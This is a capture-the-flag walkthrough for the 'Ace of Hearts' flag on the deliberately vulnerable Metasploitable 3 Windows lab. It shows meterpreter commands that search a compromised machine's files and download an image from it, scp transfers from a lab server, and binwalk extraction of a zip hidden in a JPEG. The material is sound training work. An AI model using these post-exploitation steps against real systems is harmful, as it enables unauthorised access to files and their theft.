---
title: Ace of Hearts
description: Metasploitable 3 Windows - Ace of Hearts
extends: _layouts.documentation
section: content
---

# Ace of Hearts

1\. Setup a meterpreter shell on the target system by following the same exploit used in the [King of Diamonds Walkthrough](/walkthroughs/metasploitable-3-windows/king-of-diamonds/).

2\. Search for flags from the root C: directory, you'll see a lot of flags. The one we're interested in right now is the ace_of_hearts.jpg
```bash
meterpreter > search -f *_of_* ./
Found 61 results...
    ...plenty of results...
    c:\Users\Public\Pictures\ace_of_hearts.jpg (480172 bytes)
   ...even more results...
```

3\. Download the ace of hearts.
```bash
meterpreter > ls
Listing: C:\Users\Public\Pictures
=================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2009-07-14 04:57:54 +0000  Sample Pictures
100666/rw-rw-rw-  480172  fil   2019-06-02 09:36:20 +0000  ace_of_hearts.jpg
100666/rw-rw-rw-  380     fil   2009-07-14 04:57:54 +0000  desktop.ini
100666/rw-rw-rw-  406134  fil   2019-06-02 09:36:20 +0000  ten_of_diamonds.png

meterpreter > download ace_of_hearts.jpg
[*] Downloading: ace_of_hearts.jpg -> ace_of_hearts.jpg
[*] Downloaded 468.92 KiB of 468.92 KiB (100.0%): ace_of_hearts.jpg -> ace_of_hearts.jpg
[*] download   : ace_of_hearts.jpg -> ace_of_hearts.jpg
```

4\. Exit back to your kali instance, you'll see the downloaded file in your home directory
```bash
root@fe7131fe927e:~# ls
ace_of_hearts.jpg  docker-compose.yaml
```

5\. From your local machine, copy down the image.
```bash
$ scp -i ../hacker-lab hacker-lab@178.128.14.83:/home/hacker-lab/ace_of_hearts.jpg ./
Enter passphrase for key '../hacker-lab':
ace_of_hearts.jpg
```

6\. It looks a little different from previous flags, let's inspect it further.

<img src="/assets/images/walkthroughs/metasploitable-3-windows/ace-of-hearts/ace_of_hearts.jpg">

7\. Back in our kali instance let's use binwalk
```bash
root@fe7131fe927e:~# binwalk ace_of_hearts.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
20087         0x4E77          Zip archive data, at least v1.0 to extract, compressed size: 459917, uncompressed size: 459917, name: ace_of_hearts.png
480150        0x75396         End of Zip archive, footer length: 22
```

8\. There is a zip archive hidden in the file! Let's extract it.
```bash
root@fe7131fe927e:~# binwalk -e ace_of_hearts.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
20087         0x4E77          Zip archive data, at least v1.0 to extract, compressed size: 459917, uncompressed size: 459917, name: ace_of_hearts.png
480150        0x75396         End of Zip archive, footer length: 22

root@fe7131fe927e:~# ls
_ace_of_hearts.jpg.extracted  ace_of_hearts.jpg  docker-compose.yaml
root@fe7131fe927e:~# cd _ace_of_hearts.jpg.extracted/
root@fe7131fe927e:~/_ace_of_hearts.jpg.extracted# ls
4E77.zip  ace_of_hearts.png
```

9\. Let's copy the **ace_of_hearts.png** file down to our local machine.
```bash
$ scp -i ../hacker-lab hacker-lab@178.128.14.83:/home/hacker-lab/_ace_of_hearts.jpg.extracted/ace_of_hearts.png ./
Enter passphrase for key '../hacker-lab':
ace_of_hearts.png
```

10\. And another flag!

<img src="/assets/images/walkthroughs/metasploitable-3-windows/ace-of-hearts/ace_of_hearts.png">